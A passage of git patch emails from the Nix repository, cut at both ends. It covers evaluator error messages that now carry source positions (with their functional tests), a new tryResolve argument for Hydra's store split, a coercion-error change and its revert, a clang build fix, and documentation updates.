"g1w7hyyyy1w7hy3qg1w7hy3qgqqqqy3q-foo.drv", + }, + }; + info.narSize = 34878; + info; + }), + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + unkeyedValidPathInfo_2_4, + "unkeyed-valid-path-info-2.4", + 2 << 8 | 4, + (std::tuple { + ({ + UnkeyedValidPathInfo info { + Hash::parseSRI("sha256-FePFYIlMuycIXPZbWi7LGEiMmZSX9FMbaQenWBzm1Sc="), + }; + info.deriver = StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar.drv", + }; + info.references = { + StorePath { + "g1w7hyyyy1w7hy3qg1w7hy3qgqqqqy3q-foo.drv", + }, + }; + info.narSize = 34878; + info; + }), + ({ + ValidPathInfo info { + *LibStoreTest::store, + "foo", + FixedOutputInfo { + .method = FileIngestionMethod::Recursive, + .hash = hashString(HashAlgorithm::SHA256, "(...)"), + .references = { + .others = { + StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar", + }, + }, + .self = true, + }, + }, + Hash::parseSRI("sha256-FePFYIlMuycIXPZbWi7LGEiMmZSX9FMbaQenWBzm1Sc="), + }; + info.deriver = StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar.drv", + }; + info.narSize = 34878; + info.sigs = { + "fake-sig-1", + "fake-sig-2", + }, + static_cast(std::move(info)); + }), + })) + VERSIONED_CHARACTERIZATION_TEST( ServeProtoTest, vector, From 0b80935c22f367b1deecffeddb97c90d7ed985e9 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 7 Dec 2023 10:01:42 -0800 Subject: [PATCH 070/654] Pass positions when evaluating MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This includes position information in more places, making debugging easier. Before: ``` $ nix-instantiate --show-trace --eval tests/functional/lang/eval-fail-using-set-as-attr-name.nix error: … while evaluating an attribute name at «none»:0: (source not available) error: value is a set while a string was expected ``` After: ``` error: … while evaluating an attribute name at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: 4| in 5| attr.${key} | ^ 6| error: value is a set while a string was expected ``` --- .../rl-next/source-positions-in-errors.md | 45 +++++++++++++++++++ src/libexpr/eval-inline.hh | 12 ++--- src/libexpr/eval.cc | 18 ++++---- src/libexpr/nixexpr.hh | 1 + .../lang/eval-fail-attr-name-type.err.exp | 20 +++++++++ .../lang/eval-fail-attr-name-type.nix | 7 +++ .../lang/eval-fail-call-primop.err.exp | 12 +++++ .../functional/lang/eval-fail-call-primop.nix | 1 + .../lang/eval-fail-not-throws.err.exp | 18 ++++++++ .../functional/lang/eval-fail-not-throws.nix | 1 + .../eval-fail-using-set-as-attr-name.err.exp | 11 +++++ .../lang/eval-fail-using-set-as-attr-name.nix | 5 +++ 12 files changed, 137 insertions(+), 14 deletions(-) create mode 100644 doc/manual/rl-next/source-positions-in-errors.md create mode 100644 tests/functional/lang/eval-fail-attr-name-type.err.exp create mode 100644 tests/functional/lang/eval-fail-attr-name-type.nix create mode 100644 tests/functional/lang/eval-fail-call-primop.err.exp create mode 100644 tests/functional/lang/eval-fail-call-primop.nix create mode 100644 tests/functional/lang/eval-fail-not-throws.err.exp create mode 100644 tests/functional/lang/eval-fail-not-throws.nix create mode 100644 tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp create mode 100644 tests/functional/lang/eval-fail-using-set-as-attr-name.nix diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md new file mode 100644 index 000000000..00f0b27e8 --- /dev/null +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -0,0 +1,45 @@ +synopsis: Source locations are printed more consistently in errors +issues: #561 +prs: #9555 +description: { + +Source location information is now included in error messages more +consistently. Given this code: + +```nix +let + attr = {foo = "bar";}; + key = {}; +in + attr.${key} +``` + +Previously, Nix would show this unhelpful message when attempting to evaluate +it: + +``` +error: + … while evaluating an attribute name + + at «none»:0: (source not available) + + error: value is a set while a string was expected +``` + +Now, the error message displays where the problematic value was found: + +``` +error: + … while evaluating an attribute name + + at bad.nix:4:11: + + 3| key = {}; + 4| in attr.${key} + | ^ + 5| + + error: value is a set while a string was expected +``` + +} diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index a988fa40c..c37b1d62b 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -103,8 +103,10 @@ void EvalState::forceValue(Value & v, Callable getPos) throw; } } - else if (v.isApp()) - callFunction(*v.app.left, *v.app.right, v, noPos); + else if (v.isApp()) { + PosIdx pos = getPos(); + callFunction(*v.app.left, *v.app.right, v, pos); + } else if (v.isBlackhole()) error("infinite recursion encountered").atPos(getPos()).template debugThrow(); } @@ -121,9 +123,9 @@ template [[gnu::always_inline]] inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view errorCtx) { - forceValue(v, noPos); + PosIdx pos = getPos(); + forceValue(v, pos); if (v.type() != nAttrs) { - PosIdx pos = getPos(); error("value is %1% while a set was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); } } @@ -132,7 +134,7 @@ inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view e [[gnu::always_inline]] inline void EvalState::forceList(Value & v, const PosIdx pos, std::string_view errorCtx) { - forceValue(v, noPos); + forceValue(v, pos); if (!v.isList()) { error("value is %1% while a list was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 7e68e6f9b..8a6e07fb0 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -344,7 +344,7 @@ static Symbol getName(const AttrName & name, EvalState & state, Env & env) } else { Value nameValue; name.expr->eval(state, env, nameValue); - state.forceStringNoCtx(nameValue, noPos, "while evaluating an attribute name"); + state.forceStringNoCtx(nameValue, name.expr->getPos(), "while evaluating an attribute name"); return state.symbols.create(nameValue.string_view()); } } @@ -1514,7 +1514,7 @@ void ExprOpHasAttr::eval(EvalState & state, Env & env, Value & v) e->eval(state, env, vTmp); for (auto & i : attrPath) { - state.forceValue(*vAttrs, noPos); + state.forceValue(*vAttrs, getPos()); Bindings::iterator j; auto name = getName(i, state, env); if (vAttrs->type() != nAttrs || @@ -1683,7 +1683,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & if (countCalls) primOpCalls[name]++; try { - vCur.primOp->fun(*this, noPos, args, vCur); + vCur.primOp->fun(*this, vCur.determinePos(noPos), args, vCur); } catch (Error & e) { addErrorTrace(e, pos, "while calling the '%1%' builtin", name); throw; @@ -1731,7 +1731,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & // 1. Unify this and above code. Heavily redundant. // 2. Create a fake env (arg1, arg2, etc.) and a fake expr (arg1: arg2: etc: builtins.name arg1 arg2 etc) // so the debugger allows to inspect the wrong parameters passed to the builtin. - primOp->primOp->fun(*this, noPos, vArgs, vCur); + primOp->primOp->fun(*this, vCur.determinePos(noPos), vArgs, vCur); } catch (Error & e) { addErrorTrace(e, pos, "while calling the '%1%' builtin", name); throw; @@ -1839,7 +1839,7 @@ https://nixos.org/manual/nix/stable/language/constructs.html#functions.)", symbo } } - callFunction(fun, allocValue()->mkAttrs(attrs), res, noPos); + callFunction(fun, allocValue()->mkAttrs(attrs), res, pos); } @@ -1875,7 +1875,7 @@ void ExprAssert::eval(EvalState & state, Env & env, Value & v) void ExprOpNot::eval(EvalState & state, Env & env, Value & v) { - v.mkBool(!state.evalBool(env, e, noPos, "in the argument of the not operator")); // XXX: FIXME: ! + v.mkBool(!state.evalBool(env, e, getPos(), "in the argument of the not operator")); // XXX: FIXME: ! } @@ -2316,7 +2316,7 @@ BackedStringView EvalState::coerceToString( std::string result; for (auto [n, v2] : enumerate(v.listItems())) { try { - result += *coerceToString(noPos, *v2, context, + result += *coerceToString(pos, *v2, context, "while evaluating one element of the list", coerceMore, copyToStore, canonicalizePath); } catch (Error & e) { @@ -2463,8 +2463,8 @@ SingleDerivedPath EvalState::coerceToSingleDerivedPath(const PosIdx pos, Value & bool EvalState::eqValues(Value & v1, Value & v2, const PosIdx pos, std::string_view errorCtx) { - forceValue(v1, noPos); - forceValue(v2, noPos); + forceValue(v1, pos); + forceValue(v2, pos); /* !!! Hack to support some old broken code that relies on pointer equality tests between sets. (Specifically, builderDefs calls diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 10099d49e..020286815 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -405,6 +405,7 @@ struct ExprOpNot : Expr { Expr * e; ExprOpNot(Expr * e) : e(e) { }; + PosIdx getPos() const override { return e->getPos(); } COMMON_METHODS }; diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp new file mode 100644 index 000000000..5f9a073dd --- /dev/null +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -0,0 +1,20 @@ +error: + … while evaluating the attribute 'puppy."${key}"' + + at /pwd/lang/eval-fail-attr-name-type.nix:3:5: + + 2| attrs = { + 3| puppy.doggy = {}; + | ^ + 4| }; + + … while evaluating an attribute name + + at /pwd/lang/eval-fail-attr-name-type.nix:7:17: + + 6| in + 7| attrs.puppy.${key} + | ^ + 8| + + error: value is an integer while a string was expected diff --git a/tests/functional/lang/eval-fail-attr-name-type.nix b/tests/functional/lang/eval-fail-attr-name-type.nix new file mode 100644 index 000000000..a0e76004a --- /dev/null +++ b/tests/functional/lang/eval-fail-attr-name-type.nix @@ -0,0 +1,7 @@ +let + attrs = { + puppy.doggy = {}; + }; + key = 1; +in + attrs.puppy.${key} diff --git a/tests/functional/lang/eval-fail-call-primop.err.exp b/tests/functional/lang/eval-fail-call-primop.err.exp new file mode 100644 index 000000000..19b407c47 --- /dev/null +++ b/tests/functional/lang/eval-fail-call-primop.err.exp @@ -0,0 +1,12 @@ +error: + … while calling the 'length' builtin + + at /pwd/lang/eval-fail-call-primop.nix:1:1: + + 1| builtins.length 1 + | ^ + 2| + + … while evaluating the first argument passed to builtins.length + + error: value is an integer while a list was expected diff --git a/tests/functional/lang/eval-fail-call-primop.nix b/tests/functional/lang/eval-fail-call-primop.nix new file mode 100644 index 000000000..972eb72c7 --- /dev/null +++ b/tests/functional/lang/eval-fail-call-primop.nix @@ -0,0 +1 @@ +builtins.length 1 diff --git a/tests/functional/lang/eval-fail-not-throws.err.exp b/tests/functional/lang/eval-fail-not-throws.err.exp new file mode 100644 index 000000000..b290afb0a --- /dev/null +++ b/tests/functional/lang/eval-fail-not-throws.err.exp @@ -0,0 +1,18 @@ +error: + … in the argument of the not operator + + at /pwd/lang/eval-fail-not-throws.nix:1:4: + + 1| ! (throw "uh oh!") + | ^ + 2| + + … while calling the 'throw' builtin + + at /pwd/lang/eval-fail-not-throws.nix:1:4: + + 1| ! (throw "uh oh!") + | ^ + 2| + + error: uh oh! diff --git a/tests/functional/lang/eval-fail-not-throws.nix b/tests/functional/lang/eval-fail-not-throws.nix new file mode 100644 index 000000000..a74ce4ebe --- /dev/null +++ b/tests/functional/lang/eval-fail-not-throws.nix @@ -0,0 +1 @@ +! (throw "uh oh!") diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp new file mode 100644 index 000000000..811d01b03 --- /dev/null +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -0,0 +1,11 @@ +error: + … while evaluating an attribute name + + at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: + + 4| in + 5| attr.${key} + | ^ + 6| + + error: value is a set while a string was expected diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.nix b/tests/functional/lang/eval-fail-using-set-as-attr-name.nix new file mode 100644 index 000000000..48e071a41 --- /dev/null +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.nix @@ -0,0 +1,5 @@ +let + attr = {foo = "bar";}; + key = {}; +in + attr.${key} From 96dd757b0c0f3d6702f8e38467a8bf467b43154e Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 00:44:55 -0500 Subject: [PATCH 071/654] Give `Derivation::tryResolve` an `evalStore` argument This is needed for building CA deriations with a src store / dest store split. In particular it is needed for Hydra. https://github.com/NixOS/hydra/issues/838 currently puts realizations, and thus build outputs, in the local store, but it should not. --- src/libstore/build/derivation-goal.cc | 2 +- src/libstore/derivations.cc | 4 ++-- src/libstore/derivations.hh | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index 81eef7c47..d4da374ba 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -558,7 +558,7 @@ void DerivationGoal::inputsRealised() inputDrvOutputs statefully, sometimes it gets out of sync with the real source of truth (store). So we query the store directly if there's a problem. */ - attempt = fullDrv.tryResolve(worker.store); + attempt = fullDrv.tryResolve(worker.store, &worker.evalStore); } assert(attempt); Derivation drvResolved { std::move(*attempt) }; diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 664ab7556..c35150b57 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -1002,13 +1002,13 @@ static void rewriteDerivation(Store & store, BasicDerivation & drv, const String } -std::optional Derivation::tryResolve(Store & store) const +std::optional Derivation::tryResolve(Store & store, Store * evalStore) const { std::map, StorePath> inputDrvOutputs; std::function::ChildNode &)> accum; accum = [&](auto & inputDrv, auto & node) { - for (auto & [outputName, outputPath] : store.queryPartialDerivationOutputMap(inputDrv)) { + for (auto & [outputName, outputPath] : store.queryPartialDerivationOutputMap(inputDrv, evalStore)) { if (outputPath) { inputDrvOutputs.insert_or_assign({inputDrv, outputName}, *outputPath); if (auto p = get(node.childMap, outputName)) diff --git a/src/libstore/derivations.hh b/src/libstore/derivations.hh index 290abedcf..2a326b578 100644 --- a/src/libstore/derivations.hh +++ b/src/libstore/derivations.hh @@ -342,7 +342,7 @@ struct Derivation : BasicDerivation * 2. Input placeholders are replaced with realized input store * paths. */ - std::optional tryResolve(Store & store) const; + std::optional tryResolve(Store & store, Store * evalStore = nullptr) const; /** * Like the above, but instead of querying the Nix database for From f0ac2a35d5e9dfb3a53e6cc810e871fe119cbf4b Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 8 Dec 2023 11:36:57 -0500 Subject: [PATCH 072/654] Print the value in `error: cannot coerce` messages (#9553) * Print the value in `error: cannot coerce` messages This extends the `error: cannot coerce a TYPE to a string` message to print the value that could not be coerced. This helps with debugging by making it easier to track down where the value is being produced from, especially in errors with deep or unhelpful stack traces. Co-authored-by: Valentin Gagarin --- .../rl-next/print-value-in-coercion-error.md | 50 +++++++++++++++++++ .../src/language/string-interpolation.md | 2 +- src/libexpr/eval.cc | 10 ++-- ...al-fail-bad-string-interpolation-1.err.exp | 2 +- ...al-fail-bad-string-interpolation-3.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 28 +++++------ 6 files changed, 73 insertions(+), 21 deletions(-) create mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md new file mode 100644 index 000000000..504ea67b9 --- /dev/null +++ b/doc/manual/rl-next/print-value-in-coercion-error.md @@ -0,0 +1,50 @@ +synopsis: Coercion errors include the failing value +issues: #561 +prs: #9553 +description: { + +The `error: cannot coerce a to a string` message now includes the value which caused the error. + +Previously, a failed string coercion produced a confusing error message if the trace didn't show where the offending value was defined: + +```bash +$ nix-instantiate --eval --expr ' +let x = { a = 1; }; in + +"${x}" +' +error: + … while evaluating a path segment + + at «string»:4:2: + + 3| + 4| "${x}" + | ^ + 5| + + error: cannot coerce a set to a string +``` + +Now, the error message includes the value itself: + +```bash +$ nix-instantiate --eval --expr ' +let x = { a = 1; }; in + +"${x}" +' +error: + … while evaluating a path segment + + at «string»:4:2: + + 3| + 4| "${x}" + | ^ + 5| + + error: cannot coerce a set to a string: { a = 1; } +``` + +} diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index e999b287b..6e28d2664 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -189,7 +189,7 @@ If neither is present, an error is thrown. > "${a}" > ``` > -> error: cannot coerce a set to a string +> error: cannot coerce a set to a string: { } > > at «string»:4:2: > diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 7e68e6f9b..b52274b64 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -26,9 +26,9 @@ #include #include #include -#include #include #include +#include #include #include @@ -2286,7 +2286,7 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2332,7 +2332,7 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2691,8 +2691,10 @@ void EvalState::printStatistics() std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { + std::strstream printed; + print(printed); throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string", showType()) + .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), printed.str()) }); } diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index eb73e9a52..e54ecc6d1 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index ac14f329b..6f0a96f78 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 81498f65a..c2403bee9 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string", "a Boolean"), + hintfmt("cannot coerce %s to a string: %s", "a Boolean", "true"), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = 1; }"), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1057,7 +1057,7 @@ namespace nix { ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1143,7 +1143,7 @@ namespace nix { ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string", "an integer"), + hintfmt("cannot coerce %s to a string: %s", "an integer", "1"), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1229,12 +1229,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", @@ -1279,17 +1279,17 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } From f9ee1bedcf98334d8bc015c2e04e30fbba958a3e Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 13:18:52 -0500 Subject: [PATCH 073/654] Avoid `std::strstream`, fix the clang build According https://en.cppreference.com/w/cpp/io/strstream, it has been deprecated since C++98! The Clang + Linux build systems to not have it at all, or at least be hiding it. We can just use `std::stringstream` instead, I think. --- src/libexpr/eval.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index b52274b64..5d627224f 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -28,7 +28,7 @@ #include #include #include -#include +#include #include #include @@ -2691,7 +2691,7 @@ void EvalState::printStatistics() std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { - std::strstream printed; + std::stringstream printed; print(printed); throw TypeError({ .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), printed.str()) From 005eaa1bd6c6090d5a55a062f429e6464345c6df Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 1 Dec 2023 16:40:54 +0100 Subject: [PATCH 074/654] doc/prerequisites-source: Add bdwgc-traceable-allocator patch --- doc/manual/src/installation/prerequisites-source.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/installation/prerequisites-source.md b/doc/manual/src/installation/prerequisites-source.md index d4babf1ea..907d7f63f 100644 --- a/doc/manual/src/installation/prerequisites-source.md +++ b/doc/manual/src/installation/prerequisites-source.md @@ -32,11 +32,15 @@ your distribution does not provide it, please install it from . - - The [Boehm garbage collector](http://www.hboehm.info/gc/) to reduce - the evaluator’s memory consumption (optional). To enable it, install + - The [Boehm garbage collector (`bdw-gc`)](http://www.hboehm.info/gc/) to reduce + the evaluator’s memory consumption (optional). + + To enable it, install `pkgconfig` and the Boehm garbage collector, and pass the flag `--enable-gc` to `configure`. + For `bdw-gc` <= 8.2.4 Nix needs a [small patch](https://github.com/NixOS/nix/blob/ac4d2e7b857acdfeac35ac8a592bdecee2d29838/boehmgc-traceable_allocator-public.diff) to be applied. + - The `boost` library of version 1.66.0 or higher. It can be obtained from the official web site . From ce4ca574d24abe233b717babc679e4c9228ba94b Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 6 Nov 2023 09:04:50 -0500 Subject: [PATCH 075/654] Clarify `SourceAccessor` methods should never implicitly follow symlinks The code has already been fixed (yay!) so what is left of this commit is just updating the API docs. Co-authored-by: Cole Helbling --- src/libutil/source-accessor.hh | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/src/libutil/source-accessor.hh b/src/libutil/source-accessor.hh index 3ca12d624..4f4ff09c1 100644 --- a/src/libutil/source-accessor.hh +++ b/src/libutil/source-accessor.hh @@ -26,6 +26,13 @@ struct SourceAccessor /** * Return the contents of a file as a string. + * + * @note Unlike Unix, this method should *not* follow symlinks. Nix + * by default wants to manipulate symlinks explicitly, and not + * implictly follow them, as they are frequently untrusted user data + * and thus may point to arbitrary locations. Acting on the targets + * targets of symlinks should only occasionally be done, and only + * with care. */ virtual std::string readFile(const CanonPath & path); @@ -34,7 +41,10 @@ struct SourceAccessor * called with the size of the file before any data is written to * the sink. * - * Note: subclasses of `SourceAccessor` need to implement at least + * @note Like the other `readFile`, this method should *not* follow + * symlinks. + * + * @note subclasses of `SourceAccessor` need to implement at least * one of the `readFile()` variants. */ virtual void readFile( @@ -87,6 +97,9 @@ struct SourceAccessor typedef std::map DirEntries; + /** + * @note Like `readFile`, this method should *not* follow symlinks. + */ virtual DirEntries readDirectory(const CanonPath & path) = 0; virtual std::string readLink(const CanonPath & path) = 0; From 9b7b7a7561b24d48452627709e6872d9c610428b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 02:13:32 +0100 Subject: [PATCH 076/654] Revert "Print the value in `error: cannot coerce` messages (#9553)" This reverts commit f0ac2a35d5e9dfb3a53e6cc810e871fe119cbf4b. The request from the sibling PR, which also applies here, was not addressed. https://github.com/NixOS/nix/pull/9554#issuecomment-1845095735 --- .../rl-next/print-value-in-coercion-error.md | 50 ------------------- .../src/language/string-interpolation.md | 2 +- src/libexpr/eval.cc | 10 ++-- ...al-fail-bad-string-interpolation-1.err.exp | 2 +- ...al-fail-bad-string-interpolation-3.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 28 +++++------ 6 files changed, 21 insertions(+), 73 deletions(-) delete mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md deleted file mode 100644 index 504ea67b9..000000000 --- a/doc/manual/rl-next/print-value-in-coercion-error.md +++ /dev/null @@ -1,50 +0,0 @@ -synopsis: Coercion errors include the failing value -issues: #561 -prs: #9553 -description: { - -The `error: cannot coerce a to a string` message now includes the value which caused the error. - -Previously, a failed string coercion produced a confusing error message if the trace didn't show where the offending value was defined: - -```bash -$ nix-instantiate --eval --expr ' -let x = { a = 1; }; in - -"${x}" -' -error: - … while evaluating a path segment - - at «string»:4:2: - - 3| - 4| "${x}" - | ^ - 5| - - error: cannot coerce a set to a string -``` - -Now, the error message includes the value itself: - -```bash -$ nix-instantiate --eval --expr ' -let x = { a = 1; }; in - -"${x}" -' -error: - … while evaluating a path segment - - at «string»:4:2: - - 3| - 4| "${x}" - | ^ - 5| - - error: cannot coerce a set to a string: { a = 1; } -``` - -} diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index 6e28d2664..e999b287b 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -189,7 +189,7 @@ If neither is present, an error is thrown. > "${a}" > ``` > -> error: cannot coerce a set to a string: { } +> error: cannot coerce a set to a string > > at «string»:4:2: > diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index c04e2d53d..841c223cd 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -27,9 +27,9 @@ #include #include #include +#include #include #include -#include #include #include @@ -2230,7 +2230,7 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a 